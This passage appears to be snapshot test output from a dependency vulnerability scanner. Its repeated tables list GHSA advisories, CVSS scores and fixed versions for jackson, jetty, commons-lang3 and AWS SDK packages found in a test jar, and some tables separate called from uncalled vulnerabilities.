| 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwp4-hfv6-p7hw | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gww7-p5w4-wrfv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h3cw-g4mq-c5x2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h592-38cm-4ggp | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h822-r4r5-v8jg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-jjjh-jjxp-wpff | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-m6x4-97wx-4q27 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mph4-vhrx-mv67 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mx7p-6679-8g3q | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-p43x-xfjf-5jhr | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-q93h-jc49-78gg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qjw2-hr98-qgfh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qr7j-h6gg-jmgc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r3gr-cxrf-hg25 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r695-7vr9-jgc2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rfx6-vp9g-rh7v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.2 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rgv9-q543-rqg4 | 8.2 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rpr3-cw39-3pxh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-v585-23hc-c647 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-vfqx-33qm-g869 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-w3f4-3q6j-rh82 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wh8g-3j2c-rqj5 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j288-q9x7-2f5v | 6.5 | Maven | org.apache.commons:commons-lang3 | 3.12.0 | 3.18.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cj7v-27pg-wf7q | 2.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.47 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-hmr7-m48g-48f6 | 5.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qh8g-58pp-2wxh | 6.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.12 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wjpw-4j6x-6rwh | 3.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.31 | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | Uncalled vulnerabilities | | | | | | | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-c28r-hw5m-5gv3 | 7.9 | Maven | com.amazonaws:aws-java-sdk-s3 | 1.11.327 | 1.12.261 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-7r82-7xv7-xcpj | 5.3 | Maven | org.apache.httpcomponents:httpclient | 4.5.5 | 4.5.13 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-3gh6-v5v9-6v9j | 3.5 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwcr-j4wh-j3cq | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.41 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j26w-f9rq-mr2q | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.54 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-264p-99wq-f4j6 | 7.5 | Maven | software.amazon.ion:ion-java | 1.0.2 | -- | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis - 2] --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis_and_disabled_enricher - 1] Scanning dir ./testdata/artifact/javareach_test.jar Scanned /testdata/artifact/javareach_test.jar file and found 21 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 8 packages affected by 61 known vulnerabilities (18 Critical, 32 High, 8 Medium, 3 Low, 0 Unknown) from 1 ecosystem. 60 vulnerabilities can be fixed. +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-c28r-hw5m-5gv3 | 7.9 | Maven | com.amazonaws:aws-java-sdk-s3 | 1.11.327 | 1.12.261 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-72hv-8253-57qq | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.18.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h46c-h94j-95f3 | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.15.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-288c-cq4h-88gq | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4gq5-ch57-c2mg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4w82-r329-3q67 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-57j2-w4cx-62h2 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.6.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5949-rw7g-wx7w | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5r5r-6hpj-8gg9 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5ww9-j83m-q7qx | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-645p-88qh-w398 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-6fpp-rgj9-8rwc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-85cw-hj65-qqv9 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-89qr-369f-5m5x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8c4j-34r4-xr8g | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8w26-6f25-cm9x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9gph-22xh-8x98 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9m6f-7xcq-8vf8 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-c8hm-7hpq-7jhg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cf6r-3wgc-h863 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cggj-fvv3-cqwv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cjjf-94ff-43w7 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cmfg-87vq-g5g4 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cvm9-fjm9-3572 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f3j5-rmmp-3fc5 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.8.11.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f9xh-2qgp-cq57 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fmmc-742q-jg75 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fqwf-pjwf-7vqv | 8.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gjmw-vf9h-g25v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwp4-hfv6-p7hw | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gww7-p5w4-wrfv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h3cw-g4mq-c5x2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h592-38cm-4ggp | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h822-r4r5-v8jg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-jjjh-jjxp-wpff | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-m6x4-97wx-4q27 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mph4-vhrx-mv67 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mx7p-6679-8g3q | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-p43x-xfjf-5jhr | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-q93h-jc49-78gg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qjw2-hr98-qgfh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qr7j-h6gg-jmgc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r3gr-cxrf-hg25 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r695-7vr9-jgc2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rfx6-vp9g-rh7v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.2 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rgv9-q543-rqg4 | 8.2 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rpr3-cw39-3pxh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-v585-23hc-c647 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-vfqx-33qm-g869 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-w3f4-3q6j-rh82 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wh8g-3j2c-rqj5 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j288-q9x7-2f5v | 6.5 | Maven | org.apache.commons:commons-lang3 | 3.12.0 | 3.18.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-7r82-7xv7-xcpj | 5.3 | Maven | org.apache.httpcomponents:httpclient | 4.5.5 | 4.5.13 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cj7v-27pg-wf7q | 2.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.47 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-hmr7-m48g-48f6 | 5.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qh8g-58pp-2wxh | 6.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.12 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wjpw-4j6x-6rwh | 3.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.31 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-3gh6-v5v9-6v9j | 3.5 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwcr-j4wh-j3cq | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.41 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j26w-f9rq-mr2q | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.54 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-264p-99wq-f4j6 | 7.5 | Maven | software.amazon.ion:ion-java | 1.0.2 | -- | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ --- [TestCommand_JavareachArchive/jars_can_be_scanned_with_call_analysis_and_disabled_enricher - 2] --- [TestCommand_JavareachArchive/jars_can_be_scanned_without_call_analysis - 1] Scanning dir ./testdata/artifact/javareach_test.jar Scanned /testdata/artifact/javareach_test.jar file and found 21 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 8 packages affected by 61 known vulnerabilities (18 Critical, 32 High, 8 Medium, 3 Low, 0 Unknown) from 1 ecosystem. 60 vulnerabilities can be fixed. +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ | https://osv.dev/GHSA-c28r-hw5m-5gv3 | 7.9 | Maven | com.amazonaws:aws-java-sdk-s3 | 1.11.327 | 1.12.261 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-72hv-8253-57qq | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.18.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h46c-h94j-95f3 | 8.7 | Maven | com.fasterxml.jackson.core:jackson-core | 2.14.0 | 2.15.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-288c-cq4h-88gq | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4gq5-ch57-c2mg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-4w82-r329-3q67 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-57j2-w4cx-62h2 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.6.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5949-rw7g-wx7w | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5r5r-6hpj-8gg9 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-5ww9-j83m-q7qx | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-645p-88qh-w398 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-6fpp-rgj9-8rwc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-85cw-hj65-qqv9 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-89qr-369f-5m5x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8c4j-34r4-xr8g | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-8w26-6f25-cm9x | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9gph-22xh-8x98 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-9m6f-7xcq-8vf8 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-c8hm-7hpq-7jhg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cf6r-3wgc-h863 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cggj-fvv3-cqwv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cjjf-94ff-43w7 | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cmfg-87vq-g5g4 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cvm9-fjm9-3572 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f3j5-rmmp-3fc5 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.8.11.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-f9xh-2qgp-cq57 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fmmc-742q-jg75 | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-fqwf-pjwf-7vqv | 8.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gjmw-vf9h-g25v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwp4-hfv6-p7hw | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gww7-p5w4-wrfv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h3cw-g4mq-c5x2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h592-38cm-4ggp | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h822-r4r5-v8jg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-jjjh-jjxp-wpff | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-m6x4-97wx-4q27 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mph4-vhrx-mv67 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mx7p-6679-8g3q | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-p43x-xfjf-5jhr | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-q93h-jc49-78gg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qjw2-hr98-qgfh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qr7j-h6gg-jmgc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r3gr-cxrf-hg25 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r695-7vr9-jgc2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rfx6-vp9g-rh7v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.2 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rgv9-q543-rqg4 | 8.2 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rpr3-cw39-3pxh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-v585-23hc-c647 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-vfqx-33qm-g869 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-w3f4-3q6j-rh82 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wh8g-3j2c-rqj5 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j288-q9x7-2f5v | 6.5 | Maven | org.apache.commons:commons-lang3 | 3.12.0 | 3.18.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-7r82-7xv7-xcpj | 5.3 | Maven | org.apache.httpcomponents:httpclient | 4.5.5 | 4.5.13 | testdata/artifact/javareach_test.jar | | 